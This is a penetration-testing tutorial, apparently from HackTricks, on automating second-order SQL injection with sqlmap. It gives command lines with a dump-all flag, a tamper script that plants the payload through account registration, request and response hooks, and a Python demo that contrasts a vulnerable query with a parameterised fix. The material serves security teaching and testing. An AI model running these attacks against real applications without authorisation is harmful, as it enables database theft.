Second Order Injection with SQLMap

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE). Browse the complete HackTricks Training catalogue for the assessment paths (ARTA/GRTA/AzRTA) and Linux Hacking Expert (LHE).

Support HackTricks

SQLMap can exploit Second Order SQLis.
You need to provide:

  • the request where the SQL injection payload will be stored
  • the request where the payload will be executed

The request where the SQL injection payload is stored is indicated just like in any other injection in sqlmap. The request where sqlmap can read the output/execution of the injection can be indicated with --second-url, or with --second-req if you need to indicate a complete request from a file.
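To make the two-step flow concrete from the application side, here is an added illustration (not code from the original page or from sqlmap) of why a safely parameterised store request is not enough on its own: the first query writes the value verbatim, the second query trusts it and concatenates it. The table names, sample rows, payload and the details_* functions are all constructed for this example.

```python
import sqlite3

# Constructed sample schema: a users table (the "create.php" sink) and a
# table with data the registered user must never be able to read.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT);
CREATE TABLE secrets (owner TEXT, note TEXT);
INSERT INTO secrets VALUES ('admin', 'db password: s3cr3t');
"""

def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def create_account(db, username, email):
    # First request (store step): parameterised, so the payload is written
    # to the table as plain data and nothing executes here.
    db.execute("INSERT INTO users (username, email) VALUES (?, ?)", (username, email))
    db.commit()

def details_vulnerable(db, username):
    # Second request (execution step): the stored email is trusted because it
    # "came from the database" and is concatenated into a new query.
    email = db.execute("SELECT email FROM users WHERE username = ?", (username,)).fetchone()[0]
    sql = "SELECT owner, note FROM secrets WHERE owner = '%s'" % email
    return db.execute(sql).fetchall()

def details_fixed(db, username):
    # Hardened sink: the stored value is bound as a parameter, so it can only
    # match an owner whose name is literally equal to the stored string.
    email = db.execute("SELECT email FROM users WHERE username = ?", (username,)).fetchone()[0]
    return db.execute("SELECT owner, note FROM secrets WHERE owner = ?", (email,)).fetchall()

def demo(email="' OR '1'='1"):
    # Runs both sinks against a fresh database for the same stored value and
    # returns (rows leaked by the vulnerable sink, rows from the fixed sink).
    db = new_db()
    create_account(db, "asdasdasd", email)
    return details_vulnerable(db, "asdasdasd"), details_fixed(db, "asdasdasd")

if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable sink returned:", leaked)   # all rows of secrets
    print("fixed sink returned:", safe)          # no rows
```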

Simple second order example:

#Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"

#Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt

In several cases this will not be enough, because you will need to perform other actions apart from sending the payload and accessing a different page.

When this is required you can use a sqlmap tamper. For example, the following script will register a new user using the sqlmap payload as the email and then log out.

#!/usr/bin/env python

import re
import requests
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def login_account(payload):
    # Route the side requests through the local proxy (e.g. Burp) to inspect the flow
    proxies = {'http': 'http://127.0.0.1:8080'}
    cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}

    # Register a new account, placing the sqlmap payload in the email field
    params = {"username": "asdasdasd", "email": payload, "password": "11111111"}
    url = "http://10.10.10.10/create.php"
    pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

    # Log out so that the next request (login.txt) starts from a clean session
    url = "http://10.10.10.10/exit.php"
    pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)


def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    login_account(payload)
    # The payload is returned unchanged: this tamper only performs the side requests
    return payload

A SQLMap tamper is always executed before starting an injection attempt with a payload, and it must return the payload. In this case we don't care about the payload, but we do care about sending some requests, so the payload is not modified.

Therefore, if for some reason we need a more complex flow to exploit a second order SQL injection, such as:

  • Create an account with the SQLi payload inside the "email" field
  • Log out
  • Log in with that account (login.txt)
  • Send the request to execute the SQL injection (second.txt)

This sqlmap line will help:

sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
##########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLi payload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on the email parameter (you can also do this with an "email=*" inside login.txt)
# --second-req second.txt : Request to send to execute the SQLi and get the output
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap by indicating the technique to use
# --dbms mysql : Help sqlmap by indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detect the injection by indicating the prefix
# --union-char "DTEC" : Help sqlmap by indicating a different union-char so it can identify the vuln
# -a : Dump all

Useful flags in real second-order flows

Second-order automation usually fails because the payload storage request works, but the execution request is noisy, stateful or protected. When that happens, the following flags are usually more useful than adding more payloads:

sqlmap -r login.txt -p email \
    --second-req second.txt \
    --csrf-token csrf \
    --csrf-url https://target.tld/profile \
    --csrf-method POST \
    --live-cookies cookies.txt \
    --safe-req keepalive.txt \
    --safe-freq 1 \
    --string "Welcome back" \
    --text-only

  • --csrf-token, --csrf-url, --csrf-method: Useful when the store or trigger request requires a fresh anti-CSRF token on every attempt.
  • --live-cookies: Reloads cookies before every request. Useful when a browser/Burp macro refreshes the session state in the background.
  • --safe-req and --safe-freq: Keep the workflow alive when the application logs you out or invalidates the session after a few failed probes.
  • --string, --not-string, --regexp, --code, --text-only: Useful when the second-order response contains banners, ads, timestamps or user-generated junk that makes diffing unstable.

When --tamper is not enough

tamper.py is still the simplest way to register the payload, log out, log back in and trigger the execution. However, on modern targets it is often cleaner to move part of the logic into request/response hooks:

  • --preprocess: Modify the whole HTTP request before it is sent. Useful when the second-order flow needs an extra nonce, an extra parameter or header normalization.
  • --postprocess: Clean up the HTTP response before sqlmap compares it. Useful when the second-order sink is wrapped in dynamic HTML and only a small fragment is stable.

Example request/response hooks:

#!/usr/bin/env python
# preprocess.py: loaded with --preprocess preprocess.py

def preprocess(req):
    # Append an extra parameter to the request body before sqlmap sends it
    if req.data:
        req.data += b"&preview=1"


#!/usr/bin/env python
# postprocess.py: loaded with --postprocess postprocess.py
import re

def postprocess(page, headers=None, code=None):
    # Strip the volatile timestamp fragment so that page comparison stays stable
    page = re.sub(br"<span>Generated at .*?</span>", b"", page or b"")
    return page, headers, code

Important caveats

  • Do not assume that --second-req will reflect the same payload into the * placeholder of the second request. If the trigger request also needs the injected value (or a version derived from it), a custom tamper, --preprocess or a local proxy is usually required.
  • Do not rely on --eval for the second request. The official usage documents --eval for the primary request flow; if the second request also needs per-attempt changes, handle them inside your helper scripts instead.

This structure is especially useful when the payload is stored in places such as:

  • Filenames or image metadata that are queried later
  • Registration/profile fields that are later used by admin panels
  • Sorting/filtering preferences stored server-side and replayed later
  • Workflow state that only executes after a preview, export or moderation action
